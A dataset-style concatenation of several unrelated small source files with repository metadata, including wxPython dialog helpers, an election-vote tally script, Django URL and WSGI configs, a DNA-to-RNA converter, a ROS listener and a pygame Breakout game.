return None
else:
value = dialog.GetValue()
dialog.Destroy()
return value
def DirDialog(parent,message=_('Choose a directory.'),defaultPath=''):
"""Shows a modal directory dialog and return the resulting path, or None if canceled."""
dialog = wx.DirDialog(parent,message,defaultPath,style=wx.DD_NEW_DIR_BUTTON)
if dialog.ShowModal() != wx.ID_OK:
dialog.Destroy()
return None
else:
path = dialog.GetPath()
dialog.Destroy()
return path
def ContinueQuery(parent,message,continueKey,title=_('Warning')):
"""Shows a modal continue query if value of continueKey is false. Returns True to continue.
Also provides checkbox "Don't show this in future." to set continueKey to true."""
#--ContinueKey set?
if conf.settings.get(continueKey): return wx.ID_OK
#--Generate/show dialog
dialog = wx.Dialog(parent,-1,title,size=(350,200),style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
sizer = wx.BoxSizer(wx.VERTICAL)
staticText = wx.StaticText(dialog,-1,message,style=wx.ST_NO_AUTORESIZE)
sizer.Add(staticText,1,wx.EXPAND|wx.ALL,6)
checkBox = wx.CheckBox(dialog,-1,_("Don't show this in the future."))
sizer.Add(checkBox,0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM,6)
#--Save/Cancel
sizer_h1 = wx.BoxSizer(wx.HORIZONTAL)
sizer_h1.Add((0,0),1)
sizer_h1.Add(wx.Button(dialog,wx.ID_OK))
sizer_h1.Add(wx.Button(dialog,wx.ID_CANCEL),0,wx.LEFT,4)
sizer.Add(sizer_h1,0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM,6)
dialog.SetSizer(sizer)
#--Get continue key setting and return
result = dialog.ShowModal()
if checkBox.GetValue():
conf.settings[continueKey] = 1
return result
def LogMessage(parent,message,logText,title='',style=0,asDialog=True):
#--Query Dialog
pos = conf.settings.get('mash.message.log.pos',wx.DefaultPosition)
size = conf.settings.get('mash.message.log.size',(400,400))
if asDialog:
window = wx.Dialog(parent,-1,title,pos=pos,size=size,
style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
else:
window = wx.Frame(parent,-1,title,pos=pos,size=(200,300),
style= (wx.RESIZE_BORDER | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.CLIP_CHILDREN))
window.SetIcons(globals.images['mash.icons2'].GetIconBundle())
window.SetSizeHints(200,200)
sizer = wx.BoxSizer(wx.VERTICAL)
if message:
sizer.Add(wx.StaticText(window,-1,message),0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP,6)
textCtrl = wx.TextCtrl(window,-1,logText,style=wx.TE_READONLY|wx.TE_MULTILINE)
sizer.Add(textCtrl,1,wx.EXPAND)#|wx.ALL,6)
window.SetSizer(sizer)
if asDialog:
window.ShowModal()
#--Done
conf.settings['mash.message.log.pos'] = window.GetPosition()
conf.settings['mash.message.log.size'] = window.GetSizeTuple()
window.Destroy()
else:
window.Show()
def InfoMessage(parent,message,title=_('Information'),style=(wx.OK|wx.ICON_INFORMATION)):
"""Shows a modal information message."""
return Message(parent,message,title,style)
def WarningQuery(parent,message,title='',style=(wx.YES_NO|wx.ICON_EXCLAMATION)):
"""Shows a modal warning message."""
return Message(parent,message,title,style)
def WarningMessage(parent,message,title=_('Warning'),style=(wx.OK|wx.ICON_EXCLAMATION)):
"""Shows a modal warning message."""
return Message(parent,message,title,style)
def ErrorMessage(parent,message,title=_('Error'),style=(wx.OK|wx.ICON_HAND)):
"""Shows a modal error message."""
return Message(parent,message,title,style)
def Message(parent,message,title='',style=wx.OK):
"""Shows a modal MessageDialog.
Use ErrorMessage, WarningMessage or InfoMessage."""
dialog = wx.MessageDialog(parent,message,title,style)
result = dialog.ShowModal()
dialog.Destroy()
return result
| [
"jacob@jacobessex.com"
] | jacob@jacobessex.com |
114c21b76e999987673ccb2fcfe41a294eb6c4cd | faf4934280c53ce10e91019bfcb30054f5db0b22 | /PyPoll_Challenge.py | 49b9bd2c92bcec09ecf7c1aebc6cc884eb5e9058 | [] | no_license | zoomdmartin02/Election-Analysis | a8c859cec7aba572147d67cd7dd2c5bfd1cce77a | a95968ae53e5fd98585df1f8f1384b8628e99183 | refs/heads/main | 2022-12-30T21:53:24.078902 | 2020-10-18T03:20:38 | 2020-10-18T03:20:38 | 303,420,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,336 | py | # -*- coding: UTF-8 -*-
"""PyPoll Homework Challenge Solution."""
# Add our dependencies.
import csv
import os
# Add a variable to load a file from a path.
file_to_load = os.path.join("Resources", "election_results.csv")
# Add a variable to save the file to a path.
file_to_save = os.path.join("analysis", "election_analysis.txt")
# Initialize a total vote counter.
total_votes = 0
# Candidate Options and candidate votes.
candidate_options = []
candidate_votes = {}
# 1: Create a county list and county votes dictionary.
county_list = []
county_votes = {}
# Track the winning candidate, vote count and percentage
winning_candidate = ""
winning_count = 0
winning_percentage = 0
# 2: Track the largest county and county voter turnout.
lturnout_county = ""
lturnout_county_vote_count = 0
lturnout_percentage = 0
# Read the csv and convert it into a list of dictionaries
with open(file_to_load) as election_data:
reader = csv.reader(election_data)
# Read the header
header = next(reader)
# For each row in the CSV file.
for row in reader:
# Add to the total vote count
total_votes = total_votes + 1
# Get the candidate name from each row.
candidate_name = row[2]
# 3: Extract the county name from each row.
county_name = row[1]
# If the candidate does not match any existing candidate add it to
# the candidate list
if candidate_name not in candidate_options:
# Add the candidate name to the candidate list.
candidate_options.append(candidate_name)
# And begin tracking that candidate's voter count.
candidate_votes[candidate_name] = 0
# Add a vote to that candidate's count
candidate_votes[candidate_name] += 1
# 4a: Write a decision statement that checks that the
# county does not match any existing county in the county list.
if county_name not in county_list:
# 4b: Add the existing county to the list of counties.
county_list.append(county_name)
# 4c: Begin tracking the county's vote count.
county_votes[county_name] = 0
# 5: Add a vote to that county's vote count.
county_votes[county_name] += 1
# Save the results to our text file.
with open(file_to_save, "w") as txt_file:
# Print the final vote count (to terminal)
election_results = (
f"\nElection Results:\n\n"
f"-------------------------\n"
f"Total Votes: {total_votes:,}\n"
f"-------------------------\n\n")
#f"County Votes:\n")
print(election_results, end="")
txt_file.write(election_results)
# 6a: Write a repetition statement to get the county from the county dictionary.
for county_name in county_votes:
# 6b: Retrieve the county vote count.
cvotes = county_votes.get(county_name)
# 6c: Calculate the percent of total votes for the county.
cvote_percentage = float(cvotes) / float(total_votes) * 100
# 6d: Print the county results to the terminal.
county_results = (
f"{county_name}: {cvote_percentage:.1f}% ({cvotes:,})\n\n")
print(county_results)
# 6e: Save the county votes to a text file.
txt_file.write(county_results)
# 6f: Write a decision statement to determine the winning county and get its vote count.
if (cvotes > lturnout_county_vote_count) and (cvote_percentage > lturnout_percentage):
lturnout_county_vote_count = cvotes
lturnout_county = county_name
lturnout_percentage = cvote_percentage
# 7: Print the county with the largest turnout to the terminal.
lc_turnout = (
f"-------------------------\n"
f"Largest County Turnout: {lturnout_county}\n"
f"-------------------------\n\n")
print(lc_turnout)
# 8: Save the county with the largest turnout to a text file.
txt_file.write(lc_turnout)
# Save the final candidate vote count to the text file.
for candidate_name in candidate_votes:
# Retrieve vote count and percentage
votes = candidate_votes.get(candidate_name)
vote_percentage = float(votes) / float(total_votes) * 100
candidate_results = (
f"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\n\n")
# Print each candidate's voter count and percentage to the
# terminal.
print(candidate_results)
# Save the candidate results to our text file.
txt_file.write(candidate_results)
# Determine winning vote count, winning percentage, and candidate.
if (votes > winning_count) and (vote_percentage > winning_percentage):
winning_count = votes
winning_candidate = candidate_name
winning_percentage = vote_percentage
# Print the winning candidate (to terminal)
winning_candidate_summary = (
f"-------------------------\n"
f"Winner: {winning_candidate}\n"
f"Winning Vote Count: {winning_count:,}\n"
f"Winning Percentage: {winning_percentage:.1f}%\n"
f"-------------------------\n\n")
print(winning_candidate_summary)
# Save the winning candidate's name to the text file
txt_file.write(winning_candidate_summary)
| [
"72090048+zoomdmartin02@users.noreply.github.com"
] | 72090048+zoomdmartin02@users.noreply.github.com |
527e1d3f88a693ec87caa4854d2832e4ace358cb | 496a450bc20436fdb676528a8213a754b895e306 | /moniter/urls.py | 87625c61f7100a41d201ce191cea84ae49385af0 | [] | no_license | mengguiyouziyi/Monitoring | 805dacf1ae3b6684e4930b3f0482139b8188bae5 | e2b145fbaceaf362edfe414d9690811829af5e27 | refs/heads/master | 2020-06-28T22:34:21.811173 | 2019-08-03T10:14:49 | 2019-08-03T10:14:49 | 200,201,005 | 0 | 0 | null | 2019-08-02T08:52:49 | 2019-08-02T08:52:49 | null | UTF-8 | Python | false | false | 749 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^welcome', views.welcome),
url(r'^first_welcome', views.welcome_first, name='first_welcome'),
url(r'^order', views.order),
url(r'^cate', views.cate),
url(r'^member', views.member, name='member'),
url(r'^del_data/(?P<spider_id>[0-9]+)$', views.del_data, name='del_data'),
url(r'^status_edit/(.*?)$', views.edit_status, name='status_edit'),
url(r'^edit/(?P<spider_id>[0-9]+)$', views.edit, name='edit'),
url(r'^edit_action/', views.edit_action, name='edit_action'),
url(r'^active_member', views.member_first, name='active_member'),
url(r'^json_data', views.json_data, name='json_data'),
] | [
"ysh17600824539@163.com"
] | ysh17600824539@163.com |
acf05d3118136eda97208eb88dd7e8c8055cb3e6 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Hs7YDjZALCEPRPD6Z_23.py | df3fe0713ed74b8a036c99152bfd2695f2129cfd | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py |
count_uppercase=lambda a: sum([y.isupper() for x in a for y in x])
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e727df6f8b5c810fffeda45044c20e447e6ddb8e | 29cd1124f9c5d18009a1e5a6b34a348f910679f6 | /June/June 28th/RNA_Synthesis.py | 354b5c23e4796d6d689abdbe7746b597a21189fd | [] | no_license | RobertMcCutchen/DigitalCrafts_Assignments | 39336d8baeee88ad67e8498da485c99bb313012d | 0d9553f403205d4409d48923a2d1515ab267e144 | refs/heads/master | 2022-12-11T22:22:35.352967 | 2020-02-24T01:39:47 | 2020-02-24T01:39:47 | 193,777,230 | 0 | 1 | null | 2022-12-11T01:53:27 | 2019-06-25T20:17:19 | JavaScript | UTF-8 | Python | false | false | 412 | py | import DNA_Synthesis
def generate_RNA():
DNA_array = DNA_Synthesis.generate_DNA()
RNA = []
for x in range(0, len(DNA_array)):
if DNA_array[x] == 'A':
RNA.append('U')
if DNA_array[x] == 'T':
RNA.append('A')
if DNA_array[x] == 'C':
RNA.append('G')
if DNA_array[x] == 'G':
RNA.append('C')
return(RNA)
generate_RNA() | [
"robertmccutchen@Roberts-MacBook-Air.local"
] | robertmccutchen@Roberts-MacBook-Air.local |
3daa23e04e753171636b9449afe14643a87bb625 | 8fb7e1cb6e9977d88ba3927fabe4e82b4776f50b | /PhoneBook/wsgi.py | 23231d462acc595e9abc996543488c30668418ed | [] | no_license | krishkool/Phone-Book-Manager | 792be9596bbfbe5d98f3238ea5f61f51990cee93 | e796abfba7255939c27398b3478fa89b8e7a59ae | refs/heads/master | 2023-08-11T20:31:50.741188 | 2021-09-22T10:56:37 | 2021-09-22T10:56:37 | 409,166,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for PhoneBook project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PhoneBook.settings')
application = get_wsgi_application()
| [
"arKrish.sai@gmail.com"
] | arKrish.sai@gmail.com |
e6fd23c8b678f9307032b817846c006d4af457f3 | c4802d81423fbbbe4b5e05ebd9ddeee9ef24321c | /src/receiver_test.py | db0b3214ff5b24e307c0f161427870740097f74f | [] | no_license | zukowski/xhab | bc2f472a1cc6c66fac36c80b747810d98af37870 | 6aab291ebc060cf33e84b8514af1146ed20b5c79 | refs/heads/master | 2016-09-05T18:56:49.517516 | 2013-08-21T04:08:58 | 2013-08-21T04:08:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | #!/usr/bin/env python
#omkar test code
import math
import time
import rospy #loads ros libraries
from std_msgs.msg import String #used for sending mes data in ros
from lib_robotis import * #loads robitis libraries for servos
from xhab.msg import TrajectoryJointAngles
'''
#Set up global variables for servos
USB0 = USB2Dynamixel_Device('/dev/ttyUSB0')
USB1 = USB2Dynamixel_Device('/dev/ttyUSB1')
shoulder1 = Robotis_Servo( USB0, 7 )
shoulder2 = Robotis_Servo( USB0, 2 )
elbow1 = Robotis_Servo( USB1, 3 )
elbow2 = Robotis_Servo( USB1, 4 )
wrist = Robotis_Servo( USB1, 5 )
ee = Robotis_Servo( USB1, 6 )
'''
def callback(data):
'''
#Move each of the arm joints to recieved angle
shoulder1.move_angle( math.radians( float( data.shoulder1_angle ) ) , blocking = False )
shoulder2.move_angle( math.radians( float( data.shoulder2_angle ) ) , blocking = True )
elbow1.move_angle( math.radians( float( data.elbow1_angle ) ) , blocking = True )
elbow2.move_angle( math.radians(float( data.elbow2_angle ) ) , blocking = True )
wrist.move_angle( wrist.read_angle() + math.radians( float( data.wrist_angle ) ) , blocking = True )
'''
rospy.loginfo(data)
def listener():
rospy.init_node('control_receive_arm_angles', anonymous=True)
#rospy.Subscriber('/control/arm/joint_angles', TrajectoryJointAngles, callback)
rospy.Subscriber('/joint_states', JointState, callback)
rospy.spin()
if __name__ == '__main__':
listener()
| [
"scottmishra@gmail.com"
] | scottmishra@gmail.com |
6c9106284d364625ac423ab62e764d339dc88baa | be98cf80de58239f5b2329e485d27848cd2cb1e5 | /src/pybreakout/pybreakout.py | f929db1698fb5e3c825455c031e2576bde47875c | [] | no_license | jsmith12345/pybreakout | 5adf8908413b3ff13f05d38d0ad97539197e3e0d | e97d32907858225c54fb47140e1ca77ee351d6fa | refs/heads/master | 2016-08-10T14:32:25.016919 | 2006-10-20T04:35:45 | 2006-10-20T04:35:45 | 55,521,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,580 | py | import pygame, math, time, soundmanager
from pygame.locals import *
from utilities.common import Describer
from os.path import join
from sys import exit
from random import randrange,randint
RGB_BLACK = 0,0,0
RGB_WHITE = 255,255,255
RGB_RED = 255,0,0
GB_WIDTH = 280
GB_HEIGHT = 380
PADDLE_START_TOP = GB_HEIGHT - 30
PADDLE_START_LEFT = GB_WIDTH / 2
STARTSPEED = 5
FIRST_LEVEL = 0
LAST_LEVEL = 5
class Ball(Describer):
"Ball class, represents the ball object for the PyBreakout game"
def __init__(self, imageFilename):
"Ball __init__ method creates a ball in its default position with its default states"
self.image = pygame.image.load(imageFilename)
self.rect = self.image.get_rect()
#the ball has an angle from 0 to 359 degrees
self.angle = 135
self.speed = 1
self.x_dir = 1
self.y_dir = -1
self.stuck = True
self.resetState()
def resetState(self):
"Ball is reset to sit motionless on top of paddle, launch with Spacebar"
self.rect = self.rect.move(PADDLE_START_LEFT+30, PADDLE_START_TOP-self.rect.height)
def moveDown(self, pixelsDown):
"Move the ball image down pixelsDown worth"
self.rect = self.rect.move(0,pixelsDown)
def moveUp(self, pixelsUp):
"Move the ball image up pixelsUp worth"
self.rect = self.rect.move(0,-pixelsUp)
def moveLeft(self, pixelsLeft):
"Move the ball image left pixelsLeft worth"
self.rect = self.rect.move(-pixelsLeft, 0)
def moveRight(self, pixelsRight):
"Move the ball image right pixelsRight worth"
self.rect = self.rect.move(pixelsRight, 0)
def autoMove(self):
hitWall = False
if self.stuck:
return hitWall
else:
x_part = math.cos(math.radians(self.angle))/self.speed
y_part = math.sin(math.radians(self.angle))/self.speed
#print "x_part = %s , y_part = %s"%(x_part,y_part)
if self.rect.left == 0:
self.x_dir = 1
hitWall = True
if self.rect.right == GB_WIDTH:
self.x_dir = -1
hitWall = True
if self.rect.top == 0:
self.y_dir = 1
hitWall = True
#print "x_dir = %s, y_dir = %s, x = %s, y = %s"%(self.x_dir,self.y_dir,self.rect.x,self.rect.y)
self.rect = self.rect.move(self.x_dir, self.y_dir)
return hitWall
class Bonus(Describer):
"Bonus class, represents the bonus object for the PyBreakout game"
def __init__(self, imageFilename):
self.image = pygame.image.load(imageFilename)
self.rect = self.image.get_rect()
self.speed = 1
self.x_dir = 0
self.y_dir = 1
def moveDown(self, pixelsDown):
"Move the bonus image down pixelsDown worth"
self.rect = self.rect.move(0,pixelsDown)
class Triball(Bonus):
def __init__(self, myBrick):
Bonus.__init__(self,join("resources","images","triball-bonus.png"))
self.rect.move_ip(myBrick.position)
def applyBonus(self, pybreakout):
#print "this is where I add two additional balls"
ball1 = Ball(join("resources","images","ball-mini.png"))
ball2 = Ball(join("resources","images","ball-mini.png"))
self.adjustBall(ball1,5,pybreakout)
self.adjustBall(ball2,-5,pybreakout)
pybreakout.balls.append(ball1)
pybreakout.balls.append(ball2)
#print "Adding two, len(self.balls) = " + str(len(pybreakout.balls))
def adjustBall(self,currentBall,numPixels,pybreakout):
currentBall.rect.top = 0
currentBall.rect.left = 0
#print "pybreakout.balls[1].rect = " + str(pybreakout.balls[1].rect)
currentBall.rect.move_ip(pybreakout.balls[0].rect.x,pybreakout.balls[0].rect.y+numPixels)
#print "pybreakout.balls[1].rect after moving to balls[0] = " + str(pybreakout.balls[1].rect)
currentBall.stuck = False
currentBall.x_dir = pybreakout.balls[0].x_dir
currentBall.y_dir = pybreakout.balls[0].y_dir
class Slowball(Bonus):
def __init__(self, myBrick):
Bonus.__init__(self,join("resources","images","slowball-bonus.png"))
self.rect.move_ip(myBrick.position)
def applyBonus(self, pybreakout):
pybreakout.speed = 0
class Paddle(Describer):
"A Paddle object"
def __init__(self, imageFilename, ball):
self.image = pygame.image.load(imageFilename)
self.rect = self.image.get_rect()
self.ball = ball
self.resetState()
def resetState(self):
"Paddle object is reset to the bottom center of the screen"
self.rect = self.rect.move(PADDLE_START_LEFT,PADDLE_START_TOP)
def moveLeft(self, pixelsLeft):
self.rect = self.rect.move(-pixelsLeft, 0)
if self.ball.stuck:
self.ball.rect = self.ball.rect.move(-pixelsLeft,0)
def moveRight(self, pixelsRight):
self.rect = self.rect.move(pixelsRight, 0)
if self.ball.stuck:
self.ball.rect = self.ball.rect.move(pixelsRight,0)
class Brick(Describer):
"""every brick has the following
an image: filename
point value: int
isDestructible: True/False
isDestroyed: True/False
a rectangular position: (x,y)"""
def __init__(self, imageFilename, position, value=10, destructible=True, destroyed=False):
self.image = pygame.image.load(imageFilename)
self.rect = self.image.get_rect()
self.position = position
self.rect.move_ip(position)
self.pointValue = value
self.isDestructible = destructible
self.isDestroyed = destroyed
self.hasBonus = False
self.hitCount = 0
def addBonus(self, bonusType):
self.hasBonus = True
self.bonus = bonusType
class PyBreakout(Describer):
"This is the main game class for PyBreakout"
def __init__(self):
self.running = False
self.size = GB_WIDTH, GB_HEIGHT
self.height = self.size[1]
self.width = self.size[0]
self.soundManager = soundmanager.SoundManager()
self.startGame()
self.initializeScreen()
def initializeScreen(self):
#Create Gameboard with RGB_BLACK background
self.screen = pygame.display.set_mode(self.size)
self.updateScreen()
def loadBricks(self):
self.bonuses = []
allBricks = []
levelFile = open(join('resources','levels','level'+str(self.level)+".dat"))
levelData = levelFile.readlines()
self.drawLocation = [0,120]
for levelLine in levelData:
lineBricks = levelLine.strip().split(',')
for brickChar in lineBricks:
allBricks.append(self.createBrick(brickChar))
self.drawLocation = 0,self.drawLocation[1]+10
return allBricks
def drawBricks(self):
'''given all the Brick objects:
1) Check to see if they are Destroyed
2) if not Destroyed, draw currentBrick.image at currentBrick.position'''
for currentBrick in self.bricks:
if not currentBrick.isDestroyed:
self.screen.blit(currentBrick.image, currentBrick.position)
def createBrick(self, brickChar):
"Given a brickChar, create the appropriate instance object of the Brick class and return it"
if brickChar == 'R':
newBrick = Brick(join("resources","images","brick-red.png"), self.drawLocation)
luckyNum = randint(0,4)
#luckyNum = 3
if luckyNum == 3:
newBrick.addBonus(Triball(newBrick))
elif brickChar == 'P':
newBrick = Brick(join("resources","images","brick-purple.png"), self.drawLocation)
luckyNum = randint(0,4)
if luckyNum == 3:
newBrick.addBonus(Triball(newBrick))
elif brickChar == 'G':
newBrick = Brick(join("resources","images","brick-green.png"), self.drawLocation)
luckyNum = randint(0,7)
if luckyNum == 3:
newBrick.addBonus(Slowball(newBrick))
elif brickChar == 'O':
newBrick = Brick(join("resources","images","brick-orange.png"), self.drawLocation)
luckyNum = randint(0,5)
if luckyNum == 5:
newBrick.addBonus(Triball(newBrick))
elif brickChar == 'B':
newBrick = Brick(join("resources","images","brick-blue.png"), self.drawLocation)
luckyNum = randint(0,5)
if luckyNum == 0:
newBrick.addBonus(Triball(newBrick))
elif brickChar == 'Q':
newBrick = Brick(join("resources","images","brick-grey.png"), self.drawLocation, 0, False)
elif brickChar == '.':
newBrick = Brick(join("resources","images","brick-grey.png"), self.drawLocation, 0, True, True)
if newBrick.isDestructible and not(newBrick.isDestroyed):
self.numDestructibleBricks +=1
self.drawLocation = self.drawLocation[0]+40,self.drawLocation[1]
return newBrick
def updateScreen(self):
"Draw everything on the screen"
self.screen.fill(RGB_BLACK)
#Draw Paddle and Ball
self.screen.blit(self.paddle.image, self.paddle.rect)
for ball in self.balls:
self.screen.blit(ball.image, ball.rect)
#Draw Points Label and Points String
self.screen.blit(self.pointsLabel, (10,10))
self.screen.blit(self.pointsString, (80,10))
#Draw Level Label and Level String
self.screen.blit(self.levelLabel, (200, 10))
self.screen.blit(self.levelString, (250, 10))
#Draw non-destroyed Bricks for current level
self.drawBricks()
#Draw any bonuses that are on screen at the moment
for boni in self.bonuses:
self.screen.blit(boni.image, boni.rect)
#Draw Mini-paddles signifying lifes left
self.drawMiniPaddles()
pygame.display.flip()
def drawMiniPaddles(self):
if(self.numLives == 0):
return
drawPos = 0
miniPaddleImage = pygame.image.load(join("resources","images","paddle-mini.png"))
miniPaddleRect = miniPaddleImage.get_rect()
for numLife in range(self.numLives):
self.screen.blit(miniPaddleImage,(0+drawPos,GB_HEIGHT-miniPaddleRect.height))
drawPos = drawPos + 22
def reset(self):
"Reset Ball, Paddle, and Speed to default positions and states. Called after a ball falls into the abyss."
self.balls = []
self.balls.append(Ball(join("resources","images","ball-mini.png")))
self.paddle = Paddle(join("resources","images","paddle.png"),self.balls[0])
self.pointsColor = RGB_WHITE
self.running = True
self.speed = self.level
def startGame(self):
"Start a new game, reset everything to default positions and states"
self.level = 0
self.reset()
self.points = 0
#self.level = "TEST1"
self.numDestructibleBricks = 0
#Load bricks
self.bricks = self.loadBricks()
self.numLives = 2
self.oneUpBonuses = [False,False]
self.font = pygame.font.Font(join("resources","fonts","Verdana.TTF"),12)
self.pointsLabel = self.font.render("Points: ", True, RGB_WHITE)
self.pointsString = self.font.render(str(self.points), True, self.pointsColor)
self.levelLabel = self.font.render("Level: ", True, RGB_WHITE)
self.levelString = self.font.render(str(self.level), True, RGB_WHITE)
self.gameOver = False
def play(self):
"The main game loop occurs here, checks for keyboard input, updates game state, etc..."
self.running = True
lastLevelUpTime = time.time()
#Excellent suggestions from Peter Nosgoth to have tighter control over Mouse
pygame.mouse.set_visible(False)
pygame.event.set_grab(True)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT: exit()
keys = pygame.key.get_pressed()
mouse_x = pygame.mouse.get_pos()[0]
button1,button2,button3 = pygame.mouse.get_pressed()
#print "mouse_x = %s"%mouse_x
mousePosEqual = True
while mousePosEqual:
mousePosEqual = mouse_x != self.paddle.rect.left
if mouse_x < self.paddle.rect.left:
self.paddle.moveLeft(1)
elif mouse_x > self.paddle.rect.left:
if self.paddle.rect.right < self.width:
self.paddle.moveRight(1)
else:
mousePosEqual = False
if keys[K_SPACE] or button1:
if self.balls[0].stuck:
self.balls[0].stuck = False
elif keys[K_RETURN] or button2 or button3:
if (len(self.balls) <= 0) or (len(self.balls) == 1 and not self.balls[0].stuck):
if self.numLives >=1:
self.numLives -=1
self.reset()
#print "self.numLives = %s"%self.numLives
else:
self.running = False
self.endgame()
elif keys[K_y]:
if self.gameOver:
#print "K_y pressed launch brand new game"
self.startGame()
elif keys[K_ESCAPE]:
#print "K_ESCAPE pressed launch brand new game"
exit()
if self.running:
self.checkBonusCollision()
for ball in self.balls:
self.checkBallCollision(ball)
hitWall = ball.autoMove()
if hitWall:
self.soundManager.play('cartoon-spring-sound',[0.2,0.2])
#print self.ball
if(ball.rect.top >= GB_HEIGHT):
self.balls.remove(ball)
for boni in self.bonuses:
boni.moveDown(1)
if boni.rect.y > GB_HEIGHT:
#if it reaches the bottom of the screen remove it from the bonuses list
self.bonuses.remove(boni)
self.pointsString = self.font.render(str(self.points), True, self.pointsColor)
self.updateScreen()
#All balls have left the gameboard, need to pause and wait for Right Click
# or if numLives == 0, then end game.
if len(self.balls) == 0:
self.running = False
self.pointsColor = RGB_RED
if self.numLives == 0:
self.endgame()
if self.checkLevelUp():
self.speed = self.level
if self.level == LAST_LEVEL:
self.level = -1
self.level += 1
self.levelString = self.font.render(str(self.level), True, RGB_WHITE)
self.bricks = self.loadBricks()
self.balls = []
self.balls.append(Ball(join("resources","images","ball-mini.png")))
self.paddle = Paddle(join("resources","images","paddle.png"),self.balls[0])
#Wait a couple of milliseconds
currentTime = time.time()
if(currentTime - lastLevelUpTime > 15):
lastLevelUpTime = currentTime
if (STARTSPEED - self.speed > 0):
#print "15 s elapsed increasing speed by 1"
self.speed +=1
#else:
#print "reached max speed"
pygame.time.wait(STARTSPEED - self.speed)
def checkBallCollision(self, currentBall):
if(currentBall.rect.colliderect(self.paddle.rect)):
#Check if it is a vertical collision or horizontal collision
firstFifth = self.paddle.rect.left + 8
secondFifth = self.paddle.rect.left + 16
thirdFifth = self.paddle.rect.left + 24
fourthFifth = self.paddle.rect.left + 32
if currentBall.rect.left < firstFifth:
#Any incoming ball should be redirected up and left
#print "Hit firstFifth of paddle"
currentBall.x_dir = -1
currentBall.y_dir = -1
elif currentBall.rect.left >= firstFifth and currentBall.rect.left < secondFifth:
#Any incoming ball that hits this area should be redirect in opposite y and opposite x
#print "Hit secondFifth of paddle"
currentBall.x_dir = -1
currentBall.y_dir = -1 * currentBall.y_dir
elif currentBall.rect.left >= secondFifth and currentBall.rect.left < thirdFifth:
#Any incoming ball that hits this area should be redirect in opposite y and opposite x
#print "Hit thirdFifth of paddle"
currentBall.x_dir = 0
currentBall.y_dir = -1 * currentBall.y_dir
elif currentBall.rect.left >= thirdFifth and currentBall.rect.left < fourthFifth:
#Any incoming ball that hits this area should be redirect in opposite y and opposite x
#print "Hit fourthFifth of paddle"
currentBall.x_dir = 1
currentBall.y_dir = -1 * currentBall.y_dir
else:
#print "Hit fifthFifth of paddle"
currentBall.x_dir = 1
currentBall.y_dir = -1
#paddle and ball collided, play appropriate sound
self.soundManager.play('cartoon-blurp-sound',[0.3,0.3])
#check for collision with any non-destroyed bricks
for brick in self.bricks:
if(brick.isDestroyed):
pass
elif(currentBall.rect.colliderect(brick.rect)):
if not brick.isDestructible:
#indestructible brick and ball collided, play appropriate sound
brick.hitCount += 1
self.soundManager.play('cartoon-blurp-sound',[0.3,0.3])
testpointright = currentBall.rect.left+currentBall.rect.width+1,currentBall.rect.top
testpointleft = currentBall.rect.left-1,currentBall.rect.top
testpointtop = currentBall.rect.left,currentBall.rect.top-1
testpointbottom = currentBall.rect.left,currentBall.rect.top+currentBall.rect.height+1
if(brick.rect.collidepoint(testpointright)):
#test if the right side of the ball collided with the brick
currentBall.x_dir = -1
elif(brick.rect.collidepoint(testpointleft)):
#test if the left side of the ball collided with the brick
currentBall.x_dir = 1
if(brick.rect.collidepoint(testpointtop)):
#test if top of ball collided with brick
currentBall.y_dir = 1
elif(brick.rect.collidepoint(testpointbottom)):
#test if the bottom of the ball collided with the brick
currentBall.y_dir = -1
self.points += brick.pointValue
if(brick.isDestructible or brick.hitCount == 4):
brick.isDestroyed = True
if(brick.isDestructible):
self.numDestructibleBricks -=1
self.soundManager.play('punchhard',[0.3,0.3])
if brick.hasBonus:
self.bonuses.append(brick.bonus)
#only give out bonuses when a destructible brick is hit
if (self.points == 500 and not self.oneUpBonuses[0]):
self.numLives +=1
self.soundManager.play('triangle',[0.3,0.3])
self.oneUpBonuses[0] = True
elif (self.points == 1500 and not self.oneUpBonuses[1]):
self.numLives +=1
self.soundManager.play('triangle',[0.3,0.3])
self.oneUpBonuses[1] = True
#print "numDestructibleBricks = %s"%self.numDestructibleBricks
break
def checkBonusCollision(self):
for boni in self.bonuses:
if boni.rect.colliderect(self.paddle.rect):
self.bonuses.remove(boni)
boni.applyBonus(self)
def checkLevelUp(self):
if self.numDestructibleBricks == 0:
return True
return False
def endgame(self):
#print "endgame called!"
if self.gameOver:
return
self.gameOverLabel = self.font.render("GAME OVER", True, RGB_WHITE)
self.playAgainLabel = self.font.render("Play Again?", True, RGB_WHITE)
self.instructionsLabel = self.font.render("YES (y) / NO (ESC)", True, RGB_WHITE)
self.screen.blit(self.gameOverLabel,(100, 40))
self.pointsColor = RGB_RED
self.screen.blit(self.playAgainLabel,(100, 75))
self.screen.blit(self.instructionsLabel,(80, 95))
self.gameOver = True
pygame.display.flip()
if __name__ == '__main__':
pygame.init()
pygame.font.init()
pygame.display.set_caption("PyBreakout")
game = PyBreakout()
game.initializeScreen()
game.play()
| [
